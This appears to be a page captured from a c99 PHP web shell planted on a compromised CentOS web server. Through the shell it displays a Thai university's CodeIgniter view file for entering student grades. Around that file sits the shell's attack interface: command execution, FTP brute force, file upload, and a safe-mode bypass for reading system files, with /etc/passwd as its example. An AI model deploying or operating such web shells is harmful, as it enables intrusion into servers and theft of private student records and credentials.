!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/mis2222/application/views/eregis/   drwxrwxrwx
Free 50.65 GB of 127.8 GB (39.63%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     v_addBackRegistAndSendGrade.php (9.54 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
$row_std 
= (isset($qu_std) && $qu_std!=NULL) ? $qu_std->row() : NULL;
$row_ssm = (isset($qu_ssm) && $qu_ssm!=NULL) ? $qu_ssm->row() : NULL;
$row_sy = (isset($qu_sy) && $qu_sy!=NULL) ? $qu_sy->row() : NULL;
$row_tm = (isset($qu_tm) && $qu_tm!=NULL) ? $qu_tm->row() : NULL;
?>
<script language="JavaScript1.2">
function checkGrd() {
    cnt = document.getElementById('cnt').value;

    for(i=0; i<cnt; i++) {
        if(document.getElementById('chk'+i).checked==true) {
            if(document.getElementById('grdId'+i).value=='') {
                alert('กรุณาเลือกเกรด !');
                document.getElementById('grdId'+i).focus();
                return false;
            }
        }
    }

    if(confirm("กรุณาตรวจสอบข้อมูลให้เรียบร้อยก่อนบันทึก !!"))
        return true;
    else
        return false;
}
</script>
<table width="100%" border="0" align="center" cellpadding="0" cellspacing="0">
    <tr>
        <td>
            <div align="center">
            <?php echo form_open($this->config->item("rg_folder")."grade/processBackRegistAndSendGrade", array("name" => "myform""id" => "myform"));?>
            <table width="100%" align="center" cellpadding="0" cellspacing="1" border="0">
<?php
            
if(!is_null($row_std)) {
?>
                <tr>
                    <td><table class="szone">
                        <tr bgcolor="<?php echo $tr_color_even;?>">
                            <td class="coltd_szone">รหัสนักศึกษา</td>
                            <td><font size="2"><?php echo setValue('stdCode',$row_std);?></font>
                            <input type="hidden" name="stdId" id="stdId" value="<?php echo setValue('stdId',$row_std);?>">
                            <input type="hidden" name="stdCode" id="stdCode" value="<?php echo setValue('stdCode',$row_std);?>" /></td>
                            <td class="coltd_szone">ชื่อ-นามสกุล</td>
                            <td><font size="2"><?php echo setValue('prefixName',$row_std).setValue('stdName',$row_std).' '.setValue('stdSurname',$row_std);?></font></td>
                        </tr>
                        <tr bgcolor="<?php echo $tr_color_even;?>">
                            <td class="coltd_szone">หลักสูตร</td>
                            <td colspan="3"><font size="2"><?php echo setValue('curName',$row_std);?></font>
                            <input type="hidden" name="curId" id="curId" value="<?php echo setValue('curId',$row_std);?>"></td>
                        </tr>
                        <tr bgcolor="<?php echo $tr_color_even;?>">
                            <td class="coltd_szone">ชั้นปี</td>
                            <td><font size="2" color="<?php echo $this->config->item('rg_font_color_err');?>"><b><?php echo setValue('syCode',$row_std);?></b></font></td>
                            <td class="coltd_szone">ชั้นปีที่ลงทะเบียน</td>
                            <td><font size="2" color="<?php echo $this->config->item("rg_font_color_err");?>"><b><?php echo setValue('syCode',$row_sy);?></b></font>
                            <input type="hidden" name="syId" id="syId" value="<?php echo setValue('syId',$row_sy);?>"></td>
                        </tr>
                        <tr bgcolor="<?php echo $tr_color_even;?>">
                            <td class="coltd_szone">ปีการศึกษาที่ลงทะเบียน</td>
                            <td><font size="2"><?php echo $acY;?></font>
                            <input type="hidden" name="acY" id="acY" value="<?php echo $acY;?>"></td>
                            <td class="coltd_szone">ภาคการศึกษาที่ลงทะเบียน</td>
                            <td><font size="2"><?php echo setValue('tmCode',$row_tm);?></font>
                            <input type="hidden" name="tmId" id="tmId" value="<?php echo setValue('tmId',$row_tm);?>"></td>
                        </tr>
                        <tr bgcolor="<?php echo $tr_color_even;?>">
                            <td class="coltd_szone">GPA</td>
                            <td><font size="2"><?php echo number_format(setValue('ssmGPA',$row_ssm),2);?></font></td>
                            <td class="coltd_szone">GPAX</td>
                            <td><font size="2"><?php echo number_format(setValue('ssmGPAX',$row_ssm),2);?></font></td>
                        </tr>
                        <tr>
                            <td colspan="4"><br /></td>
                        </tr>
<?php
                        
if(setValue('syCode',$row_sy) > setValue('syCode',$row_std)) {
?>
                        <tr>
                            <td colspan="4" align="center"><span class="h error"><b>** ต้องทำการเลื่อนชั้นปีนักศึกษาก่อน **</b></span></td>
                        </tr>
                        <tr>
                            <td colspan="4">
                            <input type="button" name="cancel" value="ย้อนกลับ" onClick="location.href = '<?php echo site_url($this->config->item('rg_folder')."grade/showBackRegistAndSendGrade");?>'"></td>
                        </tr>
<?php
                        
}
?>
                    </table></td>
                </tr>
<?php
                
if(!(setValue('syCode',$row_sy) > setValue('syCode',$row_std))) {
?>
                <tr>
                    <td colspan="4"><table class="headCol">
                        <tr>
                            <th class="seqCol"><font size="2" color="<?php echo $font_color_table;?>">เลือก</font></td>
                            <th class="amtCol"><font size="2" color="<?php echo $font_color_table;?>">รหัสรายวิชา</font></td>
                            <th><font size="2" color="<?php echo $font_color_table;?>">รายวิชา</font></td>
                            <th class="amtCol"><font size="2" color="<?php echo $font_color_table;?>">หน่วยกิต</font></td>
                            <th class="amtCol"><font size="2" color="<?php echo $font_color_table;?>">กลุ่มเรียน</font></td>
                            <th class="amtCol"><font size="2" color="<?php echo $font_color_table;?>">เกรด</font></td>
                        </tr>
<?php
                $i 
0;
                if(isset(
$arr) && count($arr)) {
                    foreach(
$arr as $key => $val) {
                        echo 
"<tr onmouseover=\"bgColor='".$tr_color_even."'\" onmouseout=\"bgColor='".$this->config->item("rg_mouseout")."'\">";
?>
                            <td align="center"><input type="checkbox" name="chk<?php echo $i;?>" id="chk<?php echo $i;?>" value="Y" <?php echo ($arr[$key]['rd']->num_rows()) ? 'checked' '';?>>
                            <input type="hidden" name="coId<?php echo $i;?>" id="coId<?php echo $i;?>" value="<?php echo $arr[$key]['co']->coId;?>"></td>
                            <td class="indent"><font size="2" ><?php echo $arr[$key]['co']->crsCode;?></font></td>
                            <td class="indent"><font size="2" ><?php echo explodeSquare($arr[$key]['co']->crsName);?></font>
                            <input type="hidden" name="creditAttempt<?php echo $i;?>" id="creditAttempt<?php echo $i;?>" value="<?php echo $arr[$key]['co']->crsCreditTotal;?>">
                            <input type="hidden" name="credit1<?php echo $i;?>" id="credit1<?php echo $i;?>" value="<?php echo $arr[$key]['co']->crsCredit1;?>">
                            <input type="hidden" name="credit2<?php echo $i;?>" id="credit2<?php echo $i;?>" value="<?php echo $arr[$key]['co']->crsCredit2;?>">
                            <input type="hidden" name="cdId1<?php echo $i;?>" id="cdId1<?php echo $i;?>" value="<?php echo $arr[$key]['co']->coCdId1;?>">
                            <input type="hidden" name="cdId2<?php echo $i;?>" id="cdId2<?php echo $i;?>" value="<?php echo $arr[$key]['co']->coCdId2;?>"></td>
                            <td align="center"><font size="2"><?php echo $arr[$key]['co']->crsUnit;?></font></td>
                            <td align="center"><font size="2"><?php echo $arr[$key]['co']->coSection;?></font>
                            <input type="hidden" name="coSection<?php echo $i;?>" id="coSection<?php echo $i;?>" value="<?php echo $arr[$key]['co']->coSection;?>"></td>
                            <td align="center">
<?php
                            $row_rd 
= ($arr[$key]['rd']->num_rows()) ? $arr[$key]['rd']->row() : NULL;
                            
$js "id='rdGrade".$i."'";
                            echo 
form_dropdown('rdGrade'.$i$rs_grdset_value('rdGrade'.$i,setValue('rdGrade',$row_rd), $js));
?>
                            <span class="error"><?php echo form_error('rdGrade'.$i);?></span></td>
<?php
                        $i
++;
                    }
                } else {
?>
                        </tr>
                        <tr>
                            <td colspan="6" align="center"><font size="2" color="<?php echo $font_color_err;?>">** ไม่ปรากฏรายวิชาที่เปิดสอนในฐานข้อมูล **</font></td>
                        </tr>
<?php
                
}
?>
                        <tr>
                            <th colspan="3" align="right"><font size="2" color="<?php echo $font_color_table;?>"><b>รวมหน่วยกิต</b></font></th>
                            <th align="center"><font size="2" color="<?php echo $font_color_table;?>"><?php echo number_format($creditAttempt0);?></font></th>
                            <th colspan="2"></th>
                        </tr>
                    </table></td>
                </tr>
                <tr>
                    <td colspan="4"><input type="button" name="selectAll" value="เลือกทั้งหมด" onClick="doCheckAll(this.form, true);">
                    <input type="button" name="cancelAll" value="ยกเลิกทั้งหมด" onClick="doCheckAll(this.form, false);"></td>
                </tr>
                <tr>
                    <td colspan="4" align="center"><br><input type="submit" name="add" value="บันทึก" <?php if($i == 0) echo 'disabled';?> />
                    <input type="reset" name="clear" value="เคลียร์ข้อมูล">
                    <input type="hidden" name="cnt" id="cnt" value="<?php echo $i;?>"></td>
                </tr>
<?php
                
}
            } else {
                if(isset(
$std) && $std->num_rows()) {
                    
$std $std->row();
?>
                <tr>
                    <td height="22" colspan="4" align="center"><br><font size="2" color="<?php echo $font_color_err;?>"><?php echo setValue('pfName',$std).setValue('stdName',$std).' '.setValue('stdSurname',$std).' '.setValue('sstName',$std);?></font></td>
                </tr>
<?php
                
} else {
?>
                <tr>
                    <td height="22" colspan="4" align="center"><br><font size="3" color="<?php echo $font_color_err;?>"><b>** ไม่ปรากฏรหัสนักศึกษาดังกล่าวในฐานข้อมูล **<br>กรุณาตรวจสอบข้อมูลอีกครั้ง
                    <a href="<?php echo site_url($this->config->item('rg_folder')."grade/showBackRegistAndSendGrade");?>">คลิกที่นี่</a></b></font></td>
                </tr>
<?php
                
}
            }
?>
            </table><?php echo form_close();?></div>
        <br></td>
    </tr>
</table>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0068 ]--